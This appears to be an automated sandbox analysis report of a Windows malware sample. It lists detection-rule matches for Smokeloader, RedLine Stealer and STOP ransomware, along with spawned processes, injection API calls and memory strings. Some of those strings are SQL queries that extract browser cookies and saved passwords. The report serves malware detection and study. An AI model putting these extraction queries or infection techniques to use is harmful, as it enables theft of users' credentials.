                  Source: 0000000B.00000000.531541187.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 0000000B.00000002.597495979.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 00000000.00000002.405539182.0000000000600000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.519638464.0000000000781000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000A.00000002.601332950.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.405651754.0000000000730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000000.536317423.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000A.00000000.526425573.0000000000630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000A.00000000.528795065.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.516365720.0000000000600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000A.00000002.608132947.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.514667473.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.406487208.0000000002231000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 0000000B.00000002.597582689.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 0000000B.00000000.537288789.000000000070B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000004.00000002.615454520.00000000005A0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 0000000A.00000000.535019814.0000000000728000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
                  Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
                  Source: 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: 00000000.00000002.405852892.0000000000758000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000009.00000000.532065497.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: Process Memory Space: ECFD.exe PID: 5920, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 0040E958 appears 36 times
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: String function: 0040E958 appears 36 times
                  Source: C:\Users\user\AppData\Roaming\tfgatraCode function: String function: 0040E958 appears 36 times
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402241 NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040224D NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402251 NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402219 NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040221B NtQuerySystemInformation,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401727 NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401581 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401584 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004015EF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040160A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040160E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040161D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_004015FB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_0040158A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
                  Source: file.exeStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: F4FD.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: 857.exe.1.drStatic PE information: Resource name: RT_VERSION type: VAX COFF executable, sections 52, created Sat Mar 7 05:34:56 1970, not stripped, version 79
                  Source: 3804.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: udgatra.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: tfgatra.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  Source: A28F.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
                  Source: 9763.exe.1.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_EXPORT size: 0x100 address: 0x0
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\tfgatraJump to behavior
                  Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@26/25@55/12
                  Source: C:\Users\user\AppData\Local\Temp\857.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\tfgatra C:\Users\user\AppData\Roaming\tfgatra
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4FD.exe C:\Users\user\AppData\Local\Temp\F4FD.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\857.exe C:\Users\user\AppData\Local\Temp\857.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2A57.exe C:\Users\user\AppData\Local\Temp\2A57.exe
                  Source: C:\Users\user\AppData\Local\Temp\ECFD.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3804.exe C:\Users\user\AppData\Local\Temp\3804.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\543.exe C:\Users\user\AppData\Local\Temp\543.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EAA.exe C:\Users\user\AppData\Local\Temp\EAA.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\3804.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 520
                  Source: C:\Users\user\AppData\Local\Temp\543.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 532
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\udgatra C:\Users\user\AppData\Roaming\udgatra
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\F4FD.exe C:\Users\user\AppData\Local\Temp\F4FD.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\857.exe C:\Users\user\AppData\Local\Temp\857.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2A57.exe C:\Users\user\AppData\Local\Temp\2A57.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3804.exe C:\Users\user\AppData\Local\Temp\3804.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\543.exe C:\Users\user\AppData\Local\Temp\543.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EAA.exe C:\Users\user\AppData\Local\Temp\EAA.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\ECFD.exeProcess created: C:\Users\user\AppData\Local\Temp\ECFD.exe C:\Users\user\AppData\Local\Temp\ECFD.exe
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EB37.tmpJump to behavior
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                  Source: 2A57.exe, 00000008.00000002.623701529.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.644742519.0000000002410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                  Source: EAA.exe, 0000000C.00000003.530577101.0000000000651000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;_value,s
                  Source: 2A57.exe, 00000008.00000003.506766086.0000000000851000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000003.526693551.0000000002479000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: 2A57.exe, 00000008.00000002.651334498.00000001400E2000.00000002.00000001.01000000.0000000A.sdmp, EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: C:\Users\user\AppData\Local\Temp\F4FD.exeCode function: 6_2_007CCC8D CreateToolhelp32Snapshot,Module32First,
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess812
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4500
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                  Source: C:\Users\user\AppData\Local\Temp\2A57.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\2A57.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EAA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\EAA.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
